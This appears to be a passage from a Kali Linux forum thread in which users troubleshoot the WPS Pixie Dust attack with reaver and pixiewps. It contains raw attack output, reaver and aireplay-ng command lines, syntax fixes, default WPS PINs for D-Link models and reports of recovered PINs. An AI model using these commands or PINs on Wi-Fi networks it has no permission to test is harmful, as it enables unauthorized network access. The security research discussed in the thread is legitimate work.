    [P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:02
    [P] AuthKey: ef:eb:93:91:fc:f0:16:3a:3e:b4:fe:dd:8f:b6:a8:fe:a6 :6a:7e:70:55:e5:20:78:c4:3a:c5:55:66:60:be:d0
    [+] Sending M2 message
    [P] E-Hash1: be:74:91:eb:c3:38:e0:59:7c:e1:de:5c:07:d5:1b:d3:d7 :e6:15:9e:06:09:96:f9:7c:08:4a:84:cc:df:35:0e
    [P] E-Hash2: 90:bf:2e:36:f0:65:0e:f6:41:e7:97:f8:71:02:8b:11:92 :c1:89:f1:99:63:2b:fa:01:12:6c:c5:04:b6:ec:cc
    [Pixie-Dust]
    [Pixie-Dust] Pixiewps 1.1
    [Pixie-Dust]
    [Pixie-Dust] [-] WPS pin not found!
    [Pixie-Dust]
    [Pixie-Dust][*] Time taken: 3 s
    [Pixie-Dust]
    [Pixie-Dust] [!] The AP /might be/ vulnerable to mode 4. Try again with --force or with another (newer) set of data.
    [Pixie-Dust]


    So I ran pixiewps seperately instead of reaver and it is giving me a strange error :

    [!] Bad enrollee public key -- d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:

    I don't know what it means.
    I hope you'd shed some light on that and help....

  25. #125
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Quote Originally Posted by phoenix! View Post
    Hi, @DetmL, @soxrok2212,
    I ,recently came to know about the vulnerabilities of Realtek and other chipsets and thought to check if my router was vulnerable and ran reaver with pixie dust mode -K 1
    where I got to know that the model number EV-2006-07-27 belongs to RTL8671 chipset(D-link router).

    However I'm getting that

    "WPS pin not found"

    The output is given below:

    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 7b:37:51:7f:6c:c7:a8:0b:27:e9:a1:f8:5b:88:b5:40
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
    [P] WPS Manufacturer: Realtek Semiconductor Corp.
    [P] WPS Model Name: RTL8671
    [P] WPS Model Number: EV-2006-07-27
    [P] Access Point Serial Number: 123456789012347
    [+] Received M1 message
    [P] R-Nonce: c2:ed:e2:d6:80:81:48:fd:7e:13:7b:d2:3e:6c:a0:98
    [P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:02
    [P] AuthKey: ef:eb:93:91:fc:f0:16:3a:3e:b4:fe:dd:8f:b6:a8:fe:a6 :6a:7e:70:55:e5:20:78:c4:3a:c5:55:66:60:be:d0
    [+] Sending M2 message
    [P] E-Hash1: be:74:91:eb:c3:38:e0:59:7c:e1:de:5c:07:d5:1b:d3:d7 :e6:15:9e:06:09:96:f9:7c:08:4a:84:cc:df:35:0e
    [P] E-Hash2: 90:bf:2e:36:f0:65:0e:f6:41:e7:97:f8:71:02:8b:11:92 :c1:89:f1:99:63:2b:fa:01:12:6c:c5:04:b6:ec:cc
    [Pixie-Dust]
    [Pixie-Dust] Pixiewps 1.1
    [Pixie-Dust]
    [Pixie-Dust] [-] WPS pin not found!
    [Pixie-Dust]
    [Pixie-Dust][*] Time taken: 3 s
    [Pixie-Dust]
    [Pixie-Dust] [!] The AP /might be/ vulnerable to mode 4. Try again with --force or with another (newer) set of data.
    [Pixie-Dust]


    So I ran pixiewps seperately instead of reaver and it is giving me a strange error :

    [!] Bad enrollee public key -- d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:

    I don't know what it means.
    I hope you'd shed some light on that and help....
    First, you can not use -S in your reaver command for Realtek devices. Nobody really knows why but somehow it stops pixiewps from recovering the pin.

    Second, the RTL8671 chip is strange. It seems to use a different RNG or something. I know a few people are looking into it though

    --I've also noticed that your nonce doesn't follow the 00:00:XX:XX:00:00:XX:XX pattern seen in other RTL8671 chips... hmmm. Would you be able to send me a cap containing a few WPS exchanges?

    As for the Bad enrollee key, its probably just a space somewhere in your syntax that is screwing it up. Actually I just found it:
    Code:
    d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63
    Try this instead (you'll probably have to do this for every piece of data)
    Code:
    d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63
    Welcome to the forums by the way
    Last edited by soxrok2212; 2015-06-18 at 14:07.

  26. #126
    Join Date
    2015-Apr
    Posts
    12
    Is it A DSL-2730U/DSL-2750U?

  27. #127
    Join Date
    2013-Sep
    Posts
    262
    Hi DetmL
    For the two models you speak about we could gathered generic PIN ( cf WPSPIN > Générateur PIN WPS par défaut routeurs Huawei, Belkin ...)

    DSL-2730U > 20172527
    DSL-2750U > 21464065

    If there is a common PIN we already now that we deal with a "weak" WPS implementation and so there is hope... it could be "pixie dusted" somehow...
    If you have one of this models could you please send to soxrok2212 / wiire (or you can send it to me and i wil share with them) a *.cap file with the reaver 1.5.2 stdout?
    Maybe if that is not asking too much you can add some screenshot /copy-paste from the administration interface with Wifi-WPS security parameter and information about device ?
    Thanks in advance
    Last edited by kcdtv; 2015-06-19 at 14:53.

  28. #128
    Join Date
    2015-Jun
    Posts
    6
    @soxrok2212

    Firstly, I apologize for late reply.I have got exams, last few days have been pretty intense.

    1) I tried without --dh-small-keys, but no luck
    Still WPS pin not found.

    2) I've mailed to your old email-id the reaver outputs.

    3) yea and the spaces between enrollee key :|
    tried pixiewps with correct syntax but no luck
    It says AP might be vulnerable try bruteforcing.
    Tried with --force couple of times but pin not found their either.


    @DetmL

    It is D-link DSL-2750U rev U1

    Wikidevi link: https://wikidevi.com/wiki/D-Link_DSL-2750U_rev_U1

  29. #129
    Join Date
    2015-Apr
    Posts
    12
    Quote Originally Posted by phoenix! View Post
    @DetmL

    It is D-link DSL-2750U rev U1

    Wikidevi link: https://wikidevi.com/wiki/D-Link_DSL-2750U_rev_U1
    For some unknown reason, reaver is unable to retrive the wpa2 passphrase of DSL-2730U and DSL-2750U although the default PIN is 12345670. However, Dumpper can retrive the passphrase.

  30. #130
    Join Date
    2015-Apr
    Posts
    12
    @Kcdtv
    Sorry for the confusion. I don't have either of the device.

  31. #131
    Join Date
    2015-Jun
    Posts
    6
    Quote Originally Posted by DetmL View Post
    For some unknown reason, reaver is unable to retrive the wpa2 passphrase of DSL-2730U and DSL-2750U although the default PIN is 12345670. However, Dumpper can retrive the passphrase.
    What do you mean? Default pin is 12345670? I checked with Dumpper and it couldn't find the passphrase with 12345670 as pin.

  32. #132
    Join Date
    2015-Jun
    Posts
    6
    Quote Originally Posted by kcdtv View Post
    Hi DetmL
    For the two models you speak about we could gathered generic PIN ( cf WPSPIN > Générateur PIN WPS par défaut routeurs Huawei, Belkin ...)

    DSL-2730U > 20172527
    DSL-2750U > 21464065

    If there is a common PIN we already now that we deal with a "weak" WPS implementation and so there is hope... it could be "pixie dusted" somehow...
    If you have one of this models could you please send to soxrok2212 / wiire (or you can send it to me and i wil share with them) a *.cap file with the reaver 1.5.2 stdout?
    Maybe if that is not asking too much you can add some screenshot /copy-paste from the administration interface with Wifi-WPS security parameter and information about device ?
    Thanks in advance
    Hi kcdtv,
    I can send you the pcap files to your email,if you wish.
    cannot upload pcap filese in here.

  33. #133
    Join Date
    2015-Jun
    Posts
    3
    I run
    sudo reaver -i mon0 -vvv -K 1 -b 02:26:4D:AA:XX:XX
    but I never get M3 message (e-hash1 and e-hash2). I tried with several routers and the output from reaver never contains hash1 or hash2.
    Any ideas what is wrong?
    I configured the router for WPS. It is based on Ralink RT2860. Signal is good (1m distance).

    I use a laptop with Intel Centrino Wifi N card and reaver 1.5.2 from github mod by t6_x .

  34. #134
    Join Date
    2013-Jun
    Posts
    67
    Quote Originally Posted by bora View Post
    I run
    sudo reaver -i mon0 -vvv -K 1 -b 02:26:4D:AA:XX:XX
    but I never get M3 message (e-hash1 and e-hash2). I tried with several routers and the output from reaver never contains hash1 or hash2.
    Any ideas what is wrong?
    I configured the router for WPS. It is based on Ralink RT2860. Signal is good (1m distance).

    I use a laptop with Intel Centrino Wifi N card and reaver 1.5.2 from github mod by t6_x .
    The wireless card probably does not support injection.

  35. #135
    Join Date
    2015-Jun
    Posts
    3
    It is unreliable, but I think injection works:

    sudo aireplay-ng -9 mon0
    14:00:37 Trying broadcast probe requests...
    14:00:37 Injection is working!
    .........
    14:00:39 Trying directed probe requests...
    14:00:39 84:9C:A6:A7:22:22 - channel: 2 - 'o2-WLAN25'
    14:00:39 Ping (min/avg/max): 0.978ms/5.656ms/47.815ms Power: -49.97
    14:00:39 30/30: 100%

    14:00:39 02:23:08:F9:33:11 - channel: 1 - 'EasyBox-C54211'
    14:00:40 Ping (min/avg/max): 0.926ms/7.952ms/44.700ms Power: -43.68
    14:00:40 28/30: 93%

  36. #136
    Join Date
    2013-Sep
    Posts
    262
    Quote Originally Posted by phoenix! View Post
    Hi kcdtv,
    I can send you the pcap files to your email,if you wish.
    cannot upload pcap filese in here.
    Sorry i didn't see your message.
    For sure; thank you very much! I send you a mp with my mail.
    @ bora.
    This is not really a "pixie dust issue" if you don't get a M3... It is an issue for the pixie dust attack but the problem is about how the WPS flow is done.
    And more information would be needed to be able to guess where the problem can come from.
    It is unreliable, but I think injection works:
    Don't worry : It is relliable if areplay-ng -9 works; your card can inject.

  37. #137
    Join Date
    2015-Jun
    Posts
    1
    Quote Originally Posted by bora View Post
    I run
    sudo reaver -i mon0 -vvv -K 1 -b 02:26:4D:AA:XX:XX
    but I never get M3 message (e-hash1 and e-hash2). I tried with several routers and the output from reaver never contains hash1 or hash2.
    Any ideas what is wrong?
    I configured the router for WPS. It is based on Ralink RT2860. Signal is good (1m distance).

    I use a laptop with Intel Centrino Wifi N card and reaver 1.5.2 from github mod by t6_x .
    I have the same problem. Using a 2011 MBP with broadcom drivers.
    Any help would be appreciated.

    Thanks!

  38. #138
    Join Date
    2013-Sep
    Posts
    262
    It is not that people don't want to help you but your questions are "offtopic."
    It could be an issue with reaver, with your card, with your system configuration or with the access point... etc.
    But for sure it has nothing to do with pixiewps : pixiewps needs that you collect the needed strings properly or ti cannot make the brute force of the M3.
    How to get the M3 to brute force it with it "authkey" is another question, another subject
    Cheers

  39. #139
    Join Date
    2015-Mar
    Posts
    54
    Just a quick update on the state of the 'project'.

    I'm really busy at the moment. I'll update/fix pixiewps when I'll be back (2-3 weeks), with (hopefully) some news.

  40. #140
    Best of luck!
    Looking forward to it.
    This is a Kali-Linux support forum - not general IT/infosec help.

    Useful Commands: OS, Networking, Hardware, Wi-Fi
    Troubleshooting: Kali-Linux Installation, Repository, Wi-Fi Cards (Official Docs)
    Hardware: Recommended 802.11 Wireless Cards

    Search: https://www.kali.org/search/
    Documentation: http://docs.kali.org/ (Offline PDF version)
    Bugs Reporting & Tool Requests: https://bugs.kali.org/
    Kali Tool List, Versions & Man Pages: http://tools.kali.org/

  41. #141
    Join Date
    2015-Jul
    Posts
    3
    hi i wanted help reagrding an Dlink DSL 2750u router i was testing with RTL8167 chipset with pixiewps.any updates on the issue?

  42. #142
    Join Date
    2015-Mar
    Posts
    54
    We are still looking into RTL816x chipset. We have have some information about how the nonce might be 'built'. However it's still not enough to implement a feasible bruteforce.

  43. #143
    Join Date
    2015-Aug
    Posts
    3
    Nice work indeed,tried this today on DIR-605L and worked like a charm even with bad signals ( AP is too very away), WPS trans failed for a few times and then voila.
    PIN was not default and start with 4,normal WPS attack vector would never have found it coz of lockout

    I think WPS attack is not possible for NETGEAR? tried with two different AP but no luck.
    I got lot of APS if u want me to test something new.

  44. #144
    Join Date
    2015-Jul
    Posts
    3
    Quote Originally Posted by wiire View Post
    We are still looking into RTL816x chipset. We have have some information about how the nonce might be 'built'. However it's still not enough to implement a feasible bruteforce.
    Thanks,waiting for it..also I would like to share some data regarding some vulnerable routers and chipsets (about 6 ) ,where can I submit the data?

  45. #145
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Quote Originally Posted by neo45215 View Post
    Thanks,waiting for it..also I would like to share some data regarding some vulnerable routers and chipsets (about 6 ) ,where can I submit the data?
    Contact me on skype [skype removed for obvious reasons] and I'll add it to the database
    Last edited by soxrok2212; 2015-08-08 at 13:46.

  46. #146
    Join Date
    2015-Jul
    Posts
    3
    Quote Originally Posted by soxrok2212 View Post
    Contact me on skype [skype removed for obvious reasons] and I'll add it to the database
    Will get back to you after I finish my shift, got your contact.
    Also,off topic,where can I get help regarding Kali nethunter on nexus 7 nakasig?
    Regarding reaver and pixie support tho

  47. #147
    Join Date
    2015-Mar
    Posts
    141
    Last edited by aanarchyy; 2015-08-22 at 23:53.

  48. #148
    Join Date
    2015-Jun
    Posts
    6
    Quote Originally Posted by aanarchyy View Post
    Cool Works with broadcom chipset natively?


    Also any news on RTL816x chipset, yet?

  49. #149
    Join Date
    2013-Sep
    Posts
    262
    Nice job aanarchy!

  50. #150
    Join Date
    2015-Mar
    Posts
    141
    Quote Originally Posted by kcdtv View Post
    Nice job aanarchy!
    Thanks :-D

    I have confirmed the pixiewps port does work, but i have yet to confirm the reaver port works, and i have very little time to do so, if someone would be able to test this, it would help.

Similar Threads

  1. Data gathering for pixiewps (pixie dust attack)
    By wiire in forum Community Projects
    Replies: 9
    Last Post: 3 Days Ago, 21:20
  2. WPS Pixie Dust Attack (Offline WPS Attack)
    By soxrok2212 in forum General Archive
    Replies: 353
    Last Post: 2015-05-05, 08:32
  3. Pixiewps: wps pixie dust attack tool
    By wiire in forum General Archive
    Replies: 89
    Last Post: 2015-05-04, 19:32

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •